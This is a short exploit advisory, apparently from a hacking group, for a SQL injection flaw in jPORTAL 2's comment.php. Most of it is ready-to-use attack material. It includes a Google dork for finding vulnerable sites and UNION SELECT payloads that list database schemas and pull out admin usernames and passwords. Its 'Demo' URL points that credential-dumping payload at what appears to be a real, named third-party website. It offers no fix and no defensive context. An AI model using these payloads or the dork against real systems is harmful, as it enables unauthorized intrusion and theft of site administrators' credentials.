############################################################################
# Exploit Title: jPORTAL 2 SQL Injection Vulnerabilitiy 
# Google Dork: "powered by jPORTAL 2" 
# Date: 8/12/2011
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org  
# Software Link: http://jportal2.com/
# Version: All Version
# Security Risk::High
# Tested on: GNU/Linux Ubuntu - Windows Server
############################################################################
#  Exploit:
# 
#  http://target.com/comment.php?what=news&id=[sqli]
#
#  For get The DB:
#
#  http://target.com/comment.phpwhat=news&id=999 union all select null,null,(select distinct 
#  concat(unhex(Hex(cast(schema_name as char)))) from `information_schema`.schemata limit 
#  1,1),null,null,null,null,null,null--
#
#  For get The Username & Password :
#
#  http://target.com/comment.phpwhat=news&id=999 union all select null,null,(select concat
# (unhex(Hex(cast(admins.nick as char))),0x3a,unhex(Hex(cast(admins.pass as char)))) from 
# `target_database`.admins Order by nick limit 0,1) ,null,null,null,null,null,null-- 
#  
#  Demo:
#
#  http://www.lotnisko.szprotawa.org.pl/comment.php?what=news&id=3 union all 
#  select null,null,(select concat(unhex(Hex(cast(admins.nick as char))),0x3a,unhex(Hex(cast
#  (admins.pass as char)))) from `tmnet_lotnisko`.admins Order by nick limit 0,1) 
#  ,null,null,null,null,null,null--
#
############################################################################
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R- 
# nitrojen90-hellboy-K0242-kingcope-Mr.M4st3r , ...
############################################################################
GreetZ : All H4ckCity Member
############################################################################